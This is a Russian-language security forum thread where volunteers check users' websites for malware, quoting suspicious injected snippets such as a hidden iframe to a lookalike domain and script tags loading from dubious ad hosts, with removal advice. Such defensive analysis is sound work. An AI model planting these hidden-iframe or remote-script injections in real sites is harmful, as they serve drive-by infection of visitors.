Проверить сайт на наличие вирусов, все просьбы о проверке оставляйте в этой теме

akok

Команда форума
Администратор
Сообщения
19,412
Реакции
13,385
Баллы
2,203
  • Первое сообщение
  • #1
Нашим ресурсом оказываются услуги по проверке интернет ресурсов на наличие вредоносного кода.

Прошу учесть, что помощь оказывается добровольцами и поэтому не требуйте немедленной помощи. Вам обязательно окажут помощь.

Если вы хотите проверить сайт на вирусы, то выполните простые правила оформления запроса:
  1. Администрация имеет право отказать в проверке, в случае, если проверяемый ресурс нарушает законодательство или правила данного ресурса (варез, хакерская тематика, материалы порнографического характера).
  2. Никогда не публикуйте активных ссылок. (заменяйте http на хттп, например http://safezone.cc - нужно писать как хттп://safezone.cc)
  3. Не прикрепляйте файлы, которые предлагают вам скачать подозреваемые сайты. (Просто укажите имя файла, который пытается загрузится).
  4. Если Вы подозреваете, что после посещения подозрительного сайта Ваш компьютер подвергся заражению, то лучше выполнить правила оформления запроса.

*Мы не можем гарантировать 100% результат анализа. Слишком много факторов которых невозможно учесть.
 

akok

Команда форума
Администратор
Сообщения
19,412
Реакции
13,385
Баллы
2,203
alfabravo, мне очень не нравится этот iframe в конце страницы.

PHP:
<iframe src="хттп://top10*liveinternet.org/in.cgi?7" style="display:none;"></iframe>

Сейчас ссылка редиректит на http://www.yahoo.com/robots.txt... но это сейчас.
 

alfabravo

Активный пользователь
Сообщения
19
Реакции
0
Баллы
391
А чем это может быть опасно?
 

akok

Команда форума
Администратор
Сообщения
19,412
Реакции
13,385
Баллы
2,203
alfabravo, а чем отличается http://www.liveinternet.ru/ от liveinternet.org?

Правильно доменом. Тем более liveinternet.org - "мертв" и не показывается пользователю (style="display:none;) - вывод... зловредная вставка, когда разбудят домен форум опять начнет заражать пользователей.
 

demo2007

Активный пользователь
Сообщения
2
Реакции
0
Баллы
391
Проверьте, пожалуста, сайт хттп://charter97.org/
Проблема в том, что после открытия нескольких страниц (от 4 и более) данного сайта в Opere v10.62 браузер начинает сильно тормозить, нагрузка на процессор почти постоянно 100%, меню по правой кнопке мыши появлется через большую задержку.
 

akok

Команда форума
Администратор
Сообщения
19,412
Реакции
13,385
Баллы
2,203
demo2007, ничего не вижу.
 

Валера Александров

Активный пользователь
Сообщения
3
Реакции
0
Баллы
391
Привет на моем буксе стал замечать реддирект на разные сайты,можете проверить его на вирусы и др.Вот ссылка ввв:wm.bux.wm-host.net/
 

Валера Александров

Активный пользователь
Сообщения
3
Реакции
0
Баллы
391
Валера Александров, на какие сайты? Мало входящей информации, сейчас признаков взлома не вижу.[/QUOTE]
Спасибо за помощь.:)
 

Валера Александров

Активный пользователь
Сообщения
3
Реакции
0
Баллы
391
Привет!Можете проверить этот сайт ввв.chebarkul-chess.net.ru ,на следы iframe или других парнерок? =)
 

Dana

Активный пользователь
Сообщения
1
Реакции
0
Баллы
391
Вы не могли бы проверить сайт anime-online.kz У меня аваст пишет, что он завирусован. Заранее благодарю.
 

akok

Команда форума
Администратор
Сообщения
19,412
Реакции
13,385
Баллы
2,203
Avast действительно реагирует, вечером поищу подозрительный скрипт.
 

Indomito

Активный пользователь
Сообщения
51
Реакции
32
Баллы
408
Надо проверить ресурс soft-to-all.ru/soft/41389-process-monitor-294-rus.html - хотя он вроде чисты не считая XSS
 

akok

Команда форума
Администратор
Сообщения
19,412
Реакции
13,385
Баллы
2,203
Вы не могли бы проверить сайт anime-online.kz У меня аваст пишет, что он завирусован. Заранее благодарю.
Смотрю ранее он был заражен.

рекомендую убрать:
PHP:
<script language="JavaScript" src="hттp://trafer002.net/selljs/?id=28"></script>
PHP:
<!-- Mestkom code BEGIN -->
<script type="text/javascript" src="http://dynamic.exaccess.ru/asp/dynamic_script.asp?id_d=828064"></script>
<!-- Mestkom code END -->

В общем активного заражения нет, но море рекламы. Избавьтесь от ненадёжных рекламодателей ибо они могут транслировать вредоносный код.
 

akok

Команда форума
Администратор
Сообщения
19,412
Реакции
13,385
Баллы
2,203
Надо проверить ресурс soft-to-all.ru/soft/41389-process-monitor-294-rus.html - хотя он вроде чисты не считая XSS


В шапке убрать
PHP:
<script language="JavaScript" charset="windows-1251" rel="nofollow" src="http://under-click.ru/js/if.php?id=4792"></script>

Транслирует:
PHP:
document.write('<iframe src="" name="banner" width="1" height="1" frameborder="0" marginwidth="0" marginheight="0" scrolling="no"></iframe>');


[WARN]Администрация в праве отказать в анализе ресурса в случае обнаружения контента нарушающего законодательство.
[/WARN]
 

san4elllo

Активный пользователь
Сообщения
4
Реакции
0
Баллы
391
Проверьте пожалуйста на наличие вирусов сайт хтмл://rap-russ.ru. При заходе на него опера выдает сообщение об опасности данного сайта, а Касперский идентифицирует Trojan-Downloader.HTML.Agent.sj Подскажите пожалуйста как с этим бороться? Заранее благодарен
 

Ivan_Petrov

Активный пользователь
Сообщения
4
Реакции
0
Баллы
391
Здравствуйте! Такая же беда. Обновил Касперсого и начал выдавать ошибку"Trojan-Downloader.HTML.Agent.sj" на моем сайте any-books.com. Проверть его пожайлуста.
 

akok

Команда форума
Администратор
Сообщения
19,412
Реакции
13,385
Баллы
2,203
Ivan_Petrov, код аналогичен предыдущему.

Попался на странице:
any-books.com/about/

container_12 - что это?
 

Ivan_Petrov

Активный пользователь
Сообщения
4
Реакции
0
Баллы
391
Ivan_Petrov, код аналогичен предыдущему.

Попался на странице:
any-books.com/about/

container_12 - что это?

Искал код программой в шаблоне не находит, с футера стер запись "container_12" перегрузил страницу вылезает та же ошибка.

А где тот же код найти и стереть?
 

akok

Команда форума
Администратор
Сообщения
19,412
Реакции
13,385
Баллы
2,203
Есть доступ к FTP? Выгрузите оффлайн версию ресурса и проверьте возможно один или несколько файлов могли быть изменены злоумышлениками.

Еще нельзя отбрасывать возможность взлома сервера у вашего провайдера, тогда вредоносного кода просто не найдете.
 

Ivan_Petrov

Активный пользователь
Сообщения
4
Реакции
0
Баллы
391
Та я еще грешу, на фрилансера, просил его шаблон подправить немного, что просил, он сделал, но может еще и закинул скриптец.
Так если я скачаю его на комп, каспер сможет его обнаружить и удалить?

Добавлено через 2 минуты 44 секунды
На этом же хостинге стоят еще несколько ресурсов, при заходе на них так же выдает сообщение что обнаружен троян. Вопрос, это тогда у хостера проблемы или на моем локальном компьютере он сидит?
 
Сверху Снизу